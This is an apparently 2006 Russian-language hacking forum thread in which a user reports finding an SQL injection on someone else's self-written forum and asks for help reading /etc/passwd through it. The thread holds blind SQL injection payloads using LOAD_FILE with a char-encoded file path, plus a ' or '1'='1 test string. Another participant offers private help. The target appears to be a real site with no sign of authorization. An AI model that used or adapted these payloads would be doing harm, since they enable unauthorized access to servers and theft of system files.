Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   SQL-inj на самописном форуме (https://forum.antichat.xyz/showthread.php?t=27244)

cop 14.11.2006 21:34
SQL-inj на самописном форуме
 
Нашел дырочку в одном из форумов, который судя по всему написан автором сайта.

Пытаюь проверить на существования файлы на сервере ну и потом перебором получить содержимое. К примеру /etc/passwd.

Вот как это выглядит:

Код:
view.php?forumid=1 AND -11 < (SELECT ascii(substring(LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),2,1)) FROM dayx_users LIMIT 1) /*
Воспринимается подзапрос как ложь. Т.е. всеравно что бы я написал
Код:
view.php?forumid=1 AND 1 = 0 /*
уже пробовал и так

Код:
view.php?forumid=1 AND -11 < (SELECT CONCAT(1,ascii(substring(LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),2,1))) FROM dayx_users LIMIT 1) /*
всеравно не срабатывает.

ЧТо может быть с этим оператором LOAD_FILE ?

Да, если ввожу как параметр в LOAD_FILE любое значение, то всеравно ноль реакции.

guest3297 14.11.2006 23:09
Он может быть отключен или у тебя нету прав.

cop 14.11.2006 23:34
Можно как-то проверить какие права у пользователя?

Goudini 15.11.2006 00:14
Функция Load_file() выключена на бесплатном хостнинге

cop 15.11.2006 00:35
а причем здесь бесплатный хостинг? :)

guest3297 15.11.2006 00:59
view.php?forumid=1'+or+'1' ='1/*
тести если выведет тоже самое то есть inj

cop 15.11.2006 01:42
Та это уже прошел, там есть возможность инъекции...

guest3297 15.11.2006 02:24
Стучи в асю посмотрю.


Время: 07:03